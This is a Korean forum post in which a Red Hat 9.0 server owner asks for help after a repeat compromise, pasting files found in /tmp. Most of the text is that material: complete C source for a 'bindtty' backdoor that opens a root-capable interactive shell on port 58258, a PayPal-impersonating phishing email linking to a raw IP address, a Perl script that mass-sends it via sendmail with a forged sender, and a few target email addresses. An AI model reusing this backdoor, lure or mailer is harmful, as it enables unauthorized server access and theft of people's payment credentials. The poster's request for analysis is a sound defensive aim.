또 해킹 당했습니다..아래 글 남겼던 적이 있는데 이번에 또 이상한게 해킹 당했나 봅니다

레드헷 9.0 이고 2.4.20-31.9smp 입니다...
아래 해킹 당한 부분에 대해서 홍석범 님이 얘기 하신대로
조치를 취하지 못하고 혼자 어떻게 해볼라고 했는데

또 /tmp 안에 이상한 파일들이 생겼습니다.
이게 도무지 뭐하는건지 무지 궁금 하기도 하고
서버에 어떤 영향을 미치는 지도 궁금 합니다
또한 조치법도 알려 주시기 바랍니다.

부탁 드립니다...ㅠㅠㅠㅠㅠ


/*
 bindtty - like bindshell, but with tty

 Features:
  - it can handle any number of clients
  - allocates tty for each session
  - no using termios.h/tty.h: compiles on most of gccs
  - linux specific ;(
 
 by sd <sd@sf.cz>
*/

#define HOME "/"

#define TIOCSCTTY 0x540E
#define TIOCGWINSZ      0x5413
#define TIOCSWINSZ      0x5414
#define ECHAR 0x1d

#define PORT 58258

#define BUF 32768

#include <sys/wait.h>
#include <sys/types.h>
#include <sys/resource.h>

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <string.h>
#include <fcntl.h>

struct winsize {
 unsigned short ws_row;
 unsigned short ws_col;
 unsigned short ws_xpixel;
 unsigned short ws_ypixel;
};

/* creates tty/pty name by index */
void get_tty(int num, char *base, char *buf)
{
 char series[] = "pqrstuvwxyzabcde";
 char subs[] = "0123456789abcdef";
 int pos = strlen(base);
 strcpy(buf, base);
 buf[pos] = series[(num >> 4) & 0xF];
 buf[pos+1] = subs[num & 0xF];
 buf[pos+2] = 0;
}

/* search for free pty and open it */
int open_tty(int *tty, int *pty)
{
 char buf[512];
 int i, fd;
 
 fd = open("/dev/ptmx", O_RDWR);
 close(fd);
 
 for (i=0; i < 256; i++) {
  get_tty(i, "/dev/pty", buf);
  *pty = open(buf, O_RDWR);
  if (*pty < 0) continue;
  get_tty(i, "/dev/tty", buf);
  *tty = open(buf, O_RDWR);
  if (*tty < 0) {
   close(*pty);
   continue;
  }
  return 1;
 }
 return 0;
}

/* to avoid creating zombies ;) */
void sig_child(int i)
{
 signal(SIGCHLD, sig_child);
 waitpid(-1, NULL, WNOHANG);
}

void hangout(int i)
{
 kill(0, SIGHUP);
 kill(0, SIGTERM);
}

int main()
{
 int pid;
 struct sockaddr_in serv;
 struct sockaddr_in cli;
 int sock;
 
 sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
 if (sock < 0) {
  perror("socket");
  return 1;
 }
 
 bzero((char *) &serv, sizeof(serv));
 serv.sin_family = AF_INET;
 serv.sin_addr.s_addr = htonl(INADDR_ANY);
 serv.sin_port = htons(PORT);
 if (bind(sock, (struct sockaddr *) &serv, sizeof(serv)) < 0) {
  perror("bind");
  return 1;
 }
 if (listen(sock, 5) < 0) {
  perror("listen");
  return 1;
 }
 
 printf("Daemon is starting..."); fflush(stdout);
 pid = fork();
 if (pid !=0 ) {
  printf("OK, pid = %d ", pid);
  return 0;
 }

 /* daemonize */
 setsid();
 chdir("/");
 pid = open("/dev/null", O_RDWR);
 dup2(pid, 0);
 dup2(pid, 1);
 dup2(pid, 2);
 close(pid);
 signal(SIGHUP, SIG_IGN);
 signal(SIGCHLD, sig_child);
 while (1) {
  int scli;
  int slen;
  slen = sizeof(cli);
  scli = accept(sock, (struct sockaddr *) &cli, &slen);
  if (scli < 0) continue;
  pid = fork();
  if (pid == 0) {
   int subshell;
   int tty;
   int pty;
   fd_set fds;
   char buf[BUF];
   char *argv[] = {"sh", "-i", NULL};
   #define MAXENV 256
   #define ENVLEN 256
   char *envp[MAXENV];
   char envbuf[(MAXENV+2) * ENVLEN];
   int j, i;
   char home[256];

   /* setup enviroment */
   envp[0] = home;
   sprintf(home, "HOME=%s", HOME);
   j = 0;
   do {
    i = read(scli, &envbuf[j * ENVLEN], ENVLEN);
    envp[j+1] = &envbuf[j * ENVLEN];
    j++;
    if ((j >= MAXENV) || (i < ENVLEN)) break;
   } while (envbuf[(j-1) * ENVLEN] != ' ');
   envp[j+1] = NULL;

   /* create new group */
   setpgid(0, 0);

   /* open slave & master side of tty */
   if (!open_tty(&tty, &pty)) {
    char msg[] = "Can't fork pty, bye! ";
    write(scli, msg, strlen(msg));
    close(scli);
    exit(0);
   }
   /* fork child */
   subshell = fork();
   if (subshell == 0) {
    /* close master */
    close(pty);
    /* attach tty */
    setsid();
    ioctl(tty, TIOCSCTTY);
    /* close local part of connection */
    close(scli);
    close(sock);
    signal(SIGHUP, SIG_DFL);
    signal(SIGCHLD, SIG_DFL);
    dup2(tty, 0);
    dup2(tty, 1);
    dup2(tty, 2);
    close(tty);
    execve("/bin/sh", argv, envp);
   }
   /* close slave */
   close(tty);

   signal(SIGHUP, hangout);
   signal(SIGTERM, hangout);

   while (1) {
    /* watch tty and client side */
    FD_ZERO(&fds);
    FD_SET(pty, &fds);
    FD_SET(scli, &fds);
    if (select((pty > scli) ? (pty+1) : (scli+1),
        &fds, NULL, NULL, NULL) < 0)
        {
         break;
    }
    if (FD_ISSET(pty, &fds)) {
     int count;
     count = read(pty, buf, BUF);
     if (count <= 0) break;
     if (write(scli, buf, count) <= 0) break;
    }
    if (FD_ISSET(scli, &fds)) {
     int count;
     unsigned char *p, *d;
     d = buf;
     count = read(scli, buf, BUF);   
     if (count <= 0) break;
     
     /* setup win size */
     p = memchr(buf, ECHAR, count);
     if (p) {
      unsigned char wb[5];
      int rlen = count - ((ulong) p - (ulong) buf);
      struct winsize ws;

      /* wait for rest */
      if (rlen > 5) rlen = 5;
      memcpy(wb, p, rlen);
      if (rlen < 5) {
       read(scli, &wb[rlen], 5 - rlen);
      }

      /* setup window */
      ws.ws_xpixel = ws.ws_ypixel = 0;
      ws.ws_col = (wb[1] << 8) + wb[2];
      ws.ws_row = (wb[3] << 8) + wb[4];
      ioctl(pty, TIOCSWINSZ, &ws);
      kill(0, SIGWINCH);

      /* write the rest */
      write(pty, buf, (ulong) p - (ulong) buf);
      rlen = ((ulong) buf + count) - ((ulong)p+5);
      if (rlen > 0) write(pty, p+5, rlen);
     } else
      if (write(pty, d, count) <= 0) break;
    }
   }
   close(scli);
   close(sock);
   close(pty);

   waitpid(subshell, NULL, 0);
   vhangup();
   exit(0);
  }
  close(scli);
 }
}
<DIV><DIV id=message><TT style="FONT-SIZE: x-small;
FONT-FAMILY:'couriernew',monospace">You have added <A
href="http://211.233.38.245/secure/verify/paypal/data/pl/index.htm?a s d h a j d h a s g d a s d fa s g h f g a s h d f a s d a s d a s d a s d a s d"
target=_blank>brian12313@yahoo.com </A>as a new email address for your PayPal
account.<BR><BR>If you did not authorize this change or if you need assistance
with your account, please contact PayPal customer service  at:&nbsp;</TT>
<P><TT style="FONT-SIZE: x-small; FONT-FAMILY: 'couriernew',monospace"><A
href="http://211.233.38.245/secure/verify/paypal/data/pl/index.htm?a s d h a j d h a s g d a s d fa s g h f g a s h d f a s d a s d a s d a s d a s d" target=_blank>https://www.paypal.com/row/wf/f=ap_email</A><BR><BR><BR>Thank you for using PayPal!<BR>The PayPal Team<BR><BR><BR>Please do not reply to this e-mail. Mail sent to this address cannot be answered. For assistance, log in to your PayPal account and choose the<BR>"Help" link in the header of any page.<BR><BR>----------------------------------------------------------------<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
PROTECT YOUR PASSWORD<BR><BR>&nbsp;&nbsp; NEVER give your password to anyone
and ONLY log in at <A href="http://211.233.38.245/secure/verify/paypal/data/pl/index.htm?a s d h a j d h a s g d a s d fa s g h f g a s h d f a s d a s d a s d a s d a s d" target=_blank>https://www.paypal.com/.</A> Protect yourself against fraudulent websites by opening a new web browser (e.g. Internet Explorer or Netscape) and typing in the PayPal URL every time you log in to your account.<BR><BR><BR> ---------------------------------------------------------------&nbsp;&nbsp;&nbsp;&nbsp; <BR><BR><BR></B>PayPal Email ID PP007</TT></P></DIV></DIV>
#!/usr/bin/perl

$SUBJ="You have successfully added a new email address";
$MSG="msg.txt";
$USERS="users";

open(IN,$USERS);

$id=12345;
while(chop($line=<IN>)){
    open(SM,"|/usr/sbin/sendmail $line");
    print(SM "To: $line ");
    print(SM "Subject: $SUBJ ");
    print(SM "Message-ID: <".time().".$id.qmail@paypal.com> ");
    print(SM "From: "Paypal" <accounts@paypal.com> ");
    print("Message sent to $line ");
    print(SM "Content-Type: text/html ");
    open(FILE,$MSG);
    while($line=<FILE>){
 print(SM $line);
    }
    close(FILE);
    close(SM);
    $id++;
}

close(IN);
dicalutu@aol.com
kind3r3l@yahoo.com
mansoane@aol.com
mansoane@aol.com